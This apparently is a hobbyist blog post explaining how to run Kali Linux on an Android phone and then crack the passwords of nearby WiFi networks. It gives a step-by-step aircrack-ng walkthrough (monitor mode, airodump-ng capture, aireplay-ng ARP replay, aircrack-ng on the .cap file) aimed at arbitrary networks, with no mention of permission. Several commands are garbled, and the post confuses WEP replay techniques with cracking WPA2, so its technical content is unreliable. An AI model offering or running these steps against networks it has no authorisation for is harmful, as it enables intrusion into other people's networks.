how to install kali linux on your android to hack wifi [Evergreen method] - Prime -- Tech -- Hacker

how to install kali linux on your android to hack wifi [Evergreen method]

Share This


Hello Friends,
                          From Many Time People Ask Me That How to Hack Wifi with Android but I Suggest him/her to Use Wps Wpa Wifi Tester but Now I Searched About it and Find that It won't Works Many Places and this Doesn't work with All the Router...
                                   So Here is the Awesome Solution to Hack Wifi Using Android Phone...


KALI LINUX

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
         
                           Today I am Going to Add Kali Linux Commands For Cracking Wifi Password of Security WPA2 Key with Aircrack-ng.... Which are Not Generally Crackable via Android Phone or Windows with GUI.

HOW TO INSTALL ?

            REQUIREMENTS :-

  1. BusyBox
  2. Linux Deploy
  3. VNC Viewer
  4. A Good Wifi Connection Throughout Installing Process
  5. At Least 5GB Free Space in SDCard
Open VNC Viewer - Create New Connection with Address as Local Host & Name as Kali
Open Linux Deploy - Select Properties and do the Settings Properly.
After Doing this Setting , Go Back and Click on Start - ok
It will take 1 - 1.30 Hours for Completion....  :/
At Last It will Shows Install
Now Finally Open VNC Viewer and Click on Connect.....
It will Ask for Password.... Then Write "changeme" and It will Start ur Kali linux....

SCREENSHOTS
















NOW START CRACKING PASSWORD :-

  1. Open Terminal in Kali Linux
  2. airmon-ng (This Command will Show Your Driver Name, In Mine Case Its Mono)
  3. Airmon-ng Stop mono (This Command Can Show you Some Processes that Could Cause Trouble, So You Just Need to Kill them)
  4. [If In Above Process You Find Three Processes.... So Just Write Three Times This Command] Kill PID NO.
  5. Airodump-ng Mono [Now it Will Show All Your Wifi with their BSSID, ESSID, which is the name of Access Points and Security they are having]
  • NOTE - Larger the PWR no. of WIFI You Choose... More Reliable Chance of Cracking Its Password
     6.  Now Select any Wifi and Write this Command :-

  • "airodump-ng -c CHANNEL_NO. -w bell -bssid BSSID_NO. mono" (After this Command... Calculations of Beacons & Data will Start... for Cracking a Wifi Password You Need a Huge Amount of Data)
      7.  Open New Terminal and Write :
           "aireplay-ng Channel_no. o -a bssid_of_accesspoint mono (here we are mainly Doing Handshaking and Association)

      8.  aireplay-ng -3 -bbssid_of_accesspoint mono [Here we have written -3 for aireplay attack]

      9.  After this You will See many ARP Requests going on and Your Data will Start raising at a Very high Speed which is very necessary for Cracking WIFI's Password.... many Acknowledgement and APR Request will be Displayed... But Stay Relaxed :)

      10. Open Another Terminal and Type: ls (It will Show You Two Files... in .cap File all the Data will be saved, So we will do this File too Crack the password).
       11. aircrack-ng name_of_.cap_file.

       12. In My Case, Its --- Bell-01.cap

       13. Just Holds Your Hands as it will itself try Many keys for Cracking Password and After Some Times it Will Test all the Keys and Displayed Prompt Msg as Key Found...! Decrypted Successfully.. :D 


SCREENSHOTS















Official Facebook Page - Click Here

KEEP VISITING...
ENJOY!!

3 comments:

Unknown said...

Please create a tutorial on how to use the hacking tools like air crack in android's kali linux

Unknown said...

I mean video tutorial

Ashutosh said...

Hope so this video will help you in Installing kali
https://www.youtube.com/watch?v=fSnK5KEDX8g